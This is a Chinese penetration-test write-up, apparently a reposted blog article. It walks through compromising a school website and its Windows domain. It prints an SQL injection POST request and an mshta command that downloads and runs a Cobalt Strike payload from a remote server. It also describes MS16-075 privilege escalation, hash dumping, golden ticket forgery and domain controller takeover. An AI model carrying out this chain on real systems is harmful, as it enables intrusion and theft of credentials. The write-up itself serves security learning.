侦查
目标站:www.xxxxx.xx
脆弱点:http://www.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp
SQL注入POST包:
POST /PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.asp HTTP/1.1Host: www.xxxxx.xxContent-Length: 31Cache-Control: max-age=0Origin: http://www.xxxxx.xxUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: http://www.xxxxx.xx/PhotoUpload/%E5%AD%B8%E7%94%9F%E8%AD%89%E4%BB%B6%E7%85%A7%E4%B8%8A%E5%82%B3.aspAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: ASPSESSIONIDQCABSDCS=DBGDAIKBDEHOPFOFPEAPPLBBConnection: closetxtSchoolYear=108B&txtStdID=1234
权限:DBA(SA)
![图片[1]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007448.png)
内网横向
CS设置好HTTPS监听器,生成一个html application文件
![图片[2]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007449.png)
![图片[3]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074491.png)
然后传到CS服务器上
![图片[4]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007450.png)
sqlmap在os-shell下执行mshta http://20*.*.*.2*:80/download/file.txt
![图片[5]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074501.png)
过一会有台主机上线了
![图片[6]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074502.png)
设置好beacon回连时间后检查下服务器的环境
![图片[7]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074503.png)
存在域
![图片[8]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074504.png)
![图片[9]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007451.png)
![图片[10]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074511.png)
补丁安装的较多
![图片[11]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074512.png)
复制信息到https://bugs.hacking8.com/tiquan/检查下有没有漏补的
![图片[12]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007452.png)
发现漏补MS16-075
在github上找到了该exp的cna插件https://github.com/vysecurity/reflectivepotato.git
![图片[13]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074521.png)
clone回来加载到CS里
![图片[14]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074522.png)
获取到了system权限的beacon
![图片[15]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074523.png)
需要注意的是目前进程的父进程是mssql,需要注入到其他用户的进程下,否则执行一些命令时会提示权限不够
![图片[16]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074524.png)
选择了WEGO的用户注入
![图片[17]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074525.png)
查看域控
![图片[18]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007453.png)
![图片[19]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074531.png)
根据备注,判断AD1为主域控,AD2、AD3为辅域控
![图片[20]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074532.png)
抓下hash然后备用
![图片[21]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074533.png)
接管域控
利用抓到的hash伪造金票
![图片[22]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007454.png)
然后接管AD1
![图片[23]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074541.png)
![图片[24]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074542.png)
再从AD1上抓hash
![图片[25]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007455.png)
在AD1上抓到了域管的明文密码
![图片[26]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074551.png)
然后批量梭哈
![图片[27]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074552.png)
拿下运维机
![图片[28]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-1587007456.png)
![图片[29]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074561.png)
![图片[30]-内网渗透 | 记一次域渗透实战-Pikachu Hacker](https://blog.x8s.pw/proxy.php?url=https://secpulseoss.oss-cn-shanghai.aliyuncs.com/wp-content/uploads/1970/01/beepress-image-128495-15870074562.png)
参考来源:Sp4ce博客,已获授权转载
投稿作者博客:https://0x20h.com/
本文作者:HACK_Learn
本文为安全脉搏专栏作者发布,转载请注明:https://www.secpulse.com/archives/128495.html
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容